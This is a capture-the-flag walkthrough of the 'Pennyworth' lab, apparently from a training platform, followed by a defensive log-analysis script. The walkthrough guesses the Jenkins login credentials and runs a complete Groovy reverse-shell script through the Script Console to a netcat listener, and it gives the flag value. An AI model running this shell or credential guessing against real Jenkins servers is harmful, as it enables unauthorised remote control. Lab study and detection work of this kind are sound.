
# Pennyworth


**Task 1: What does the acronym CVE stand for?**

* Common Vulnerabilities and Exposures

**Task 2: What do the three letters in CIA, referring to the CIA triad in cybersecurity, stand for?**

* Confidentiality, Integrity, Availability

**Task 3: What is the version of the service running on port 8080?**

* Run the following nmap command:

```
nmap -sV -p 8080 [Target IP]
```


* The answer is Jetty 9.4.39.v20210325

**Task 4: What version of Jenkins is running on the target?**

* Start by going to your web browser and typing in `http://[Target IP]:8080`
* At the login page, the source code does not tell us anything useful
* Try some default passwords. Nothing usual works.
* Run the request through Intruder in Burp Suite to guess the username and password
* This shows that `root:password` is a valid login
* On the admin page, the bottom right-hand corner shows the version: [Jenkins 2.289.1](https://jenkins.io/)

**Task 5: What type of script is accepted as input on the Jenkins Script Console?**

* On the first admin page, it states `Groovy Script`

**Task 6: What would the "String cmd" variable from the Groovy Script snippet be equal to if the Target VM was running Windows?**

* I believe they are asking what the CLI is for Windows:
* cmd.exe

**Task 7: What is a different command than "ip a" we could use to display our network interfaces' information on Linux?**

* In Linux, a similar command would be:
* ifconfig

**Task 8: What switch should we use with netcat for it to use UDP transport mode?**

* Quick help search on netcat shows:

  * The answer is `-u`

**Task 9: What is the term used to describe making a target host initiate a connection back to the attacker host?**

* I just know this as "reverse shell"

**Capture the Flag:**

* Browse for vulnerabilities in Jenkins.
  * Discovered <https://github.com/gquere/pwn_jenkins>
    * It lists multiple ways to bypass login, but at the end is a script you can plug into the "Script Console" under the "Manage Jenkins" tab on the right.
      * `http://[Target IP]:8080/script`
  * Start up a netcat listener on the host machine:

```
nc -lvnp 4444
```

* In the "Script Console", plug in the following script from the GitHub link above to make a reverse shell connection back to the host machine.

```
String host="HOST_IP";
int port=4444;
String cmd="/bin/bash";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
```

* The flag is located in /root/flag.txt
* The flag is "9cdfb439c7876e703e307864c9167a15"
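
From the defender's side, the same chain (password guessing at the login page, then a Script Console submission) is visible in HTTP access logs. The following is an added example, not part of the original walkthrough: it assumes a reverse proxy in front of Jenkins writing common log format, that failed logins redirect to `/loginError`, and a threshold of 3; the log lines are constructed.

```python
import re
from collections import defaultdict

# Constructed sample lines (common log format); addresses are documentation ranges.
SAMPLE_LOG = """\
203.0.113.9 - - [01/Jan/2024:10:00:01 +0000] "POST /j_spring_security_check HTTP/1.1" 302 0
203.0.113.9 - - [01/Jan/2024:10:00:01 +0000] "GET /loginError HTTP/1.1" 200 2094
203.0.113.9 - - [01/Jan/2024:10:00:02 +0000] "POST /j_spring_security_check HTTP/1.1" 302 0
203.0.113.9 - - [01/Jan/2024:10:00:02 +0000] "GET /loginError HTTP/1.1" 200 2094
203.0.113.9 - - [01/Jan/2024:10:00:03 +0000] "POST /j_spring_security_check HTTP/1.1" 302 0
203.0.113.9 - - [01/Jan/2024:10:00:03 +0000] "GET /loginError HTTP/1.1" 200 2094
203.0.113.9 - - [01/Jan/2024:10:00:04 +0000] "POST /j_spring_security_check HTTP/1.1" 302 0
203.0.113.9 - - [01/Jan/2024:10:00:04 +0000] "GET / HTTP/1.1" 200 15110
203.0.113.9 - - [01/Jan/2024:10:02:30 +0000] "POST /script HTTP/1.1" 200 8123
192.0.2.20 - - [01/Jan/2024:11:00:00 +0000] "GET /loginError HTTP/1.1" 200 2094
192.0.2.20 - - [01/Jan/2024:11:00:09 +0000] "GET /job/build/ HTTP/1.1" 200 9001
192.0.2.44 - - [01/Jan/2024:12:00:00 +0000] "POST /scriptText HTTP/1.1" 200 12
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')
CONSOLE_RE = re.compile(r"(^|/)script(Text)?/?$")  # /script, /scriptText, node-level consoles
FAIL_THRESHOLD = 3  # assumed tuning value, adjust to your environment

def analyze(log_text, threshold=FAIL_THRESHOLD):
    """Return alerts as (severity, client_ip, reason) tuples, in log order."""
    failures = defaultdict(int)  # failed-login count per client IP
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, _ts, method, target, status = m.groups()
        path = target.split("?", 1)[0]  # ignore any query string
        if method == "GET" and path.endswith("/loginError"):
            failures[ip] += 1
            if failures[ip] == threshold:  # alert once, when the threshold is reached
                alerts.append(("medium", ip, "repeated failed logins"))
        elif method == "POST" and CONSOLE_RE.search(path) and status == "200":
            guessed = failures[ip] >= threshold
            alerts.append(("critical" if guessed else "high", ip,
                           "script console run after password guessing" if guessed
                           else "script console run"))
    return alerts

if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(*alert, sep="\t")
```

Any Script Console submission is worth reviewing on its own, since it runs arbitrary Groovy as the Jenkins process; the correlation with failed logins only raises the severity.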
